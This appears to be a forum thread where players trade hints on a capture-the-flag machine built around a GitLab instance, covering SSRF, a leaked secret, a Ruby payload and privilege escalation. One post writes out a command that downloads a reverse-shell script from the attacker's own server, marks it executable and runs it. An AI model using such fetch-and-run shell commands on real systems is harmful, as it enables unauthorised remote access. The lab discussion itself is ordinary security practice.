Spoiler Removed
Hi Guys, There must be another trick than using R**** C******.
Type your comment> @mohsinhakak said:
Whoops, GitLab is taking too much time to respond. been like this for days, any information on how to get rid of this please PM , thanks
Same here, it worked great for me before
Hnmm I leaked the secret, but I canāt get r*** to run my payload. I tried adding spaces to remove =
's as 0xc45 suggested but still no luck. Any tips?
Stuck on the foothold. Iāve found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but havenāt found a way to turn this into anything yet. Searched for CVEs but havenāt found any that are useful. As usual I may have missed something obvious?
Rooted
That was an easy box?
I donāt think soā¦
Thanks, @n3ph0s for the nudge on foothold.
Feel free to PM if any help is needed.
guys im stuck in the beginning can someone dm me a hint to start with, i did a service scan and i canāt get anywhere around the website
Rooted!
why am i so distracted and overlook things???
Contrary to everyone, the user was easier than the root !
Might be luck but, things just went the right path (even not using docker prior to this)ā¦
foot:
- look carefully (enumeration)
- Some things (doā¦ cofā¦ mains) are just a pot full of honeyā¦
- find the version and build piece by piece with that (find that POC)
- When exploiting, if the payload fails, check what was said about the ā=ā symbols (i did not had that issue tho)
- remember what was, also, said, the machine might not have the bins you want/need
user:
- It was already mentioned (if you cant crack/find, just hammer the guts and reset the machine!)
root:
- Enum (latest) might help you over Peas on this one
- when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it
If nudges needed, honk the horn on pm
Thought Iād have a nice little time on this box, but it seems to be 502āing everything for me after stops/starts/resets
Edit: I had to change servers for it to work.
Actually got a shell but no idea about how to find the user flag.
Please send me some nudges.
Iāve reached the gi**ab page, registered an account, discovered the L_I, but canāt undestand how to get R_E, iāve read about ss*f but it says import url is blocked, am i on the right path? iām blocked ā¦
Spoiler Removed
This box made me sweat, there are still some mysteries that I have not solved, why some payload works for one person is not the other ā¦
I spent a lot of time setting up the env
it is not an easy box for me
if you need help PM
Yikes, this is not an easy box for me.
I thought I had some plain ruby working for generating the payload, but itās just not accepted. The āotherā more convoluted doc*** route has also failed to generate a payload which works.
Hint for those struggling with a foothold: If you get a āSomething went wrongā error, try a different bin
What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems
this approach got me good: wget āyourserver/rev.shā && chmod +x rev.sh && ./rev.sh
trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)
Having zero luck getting the payload to hit a local web server. This one has bested me.
Type your comment> @trcm said:
Having zero luck getting the payload to hit a local web server. This one has bested me.
how you generating it??
I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.
Ahha, progress. I had to add āātimeout=3 --tries=1ā as wget wasnāt reaching my web service and was executing in place on the rails console borking the erb instance it seems.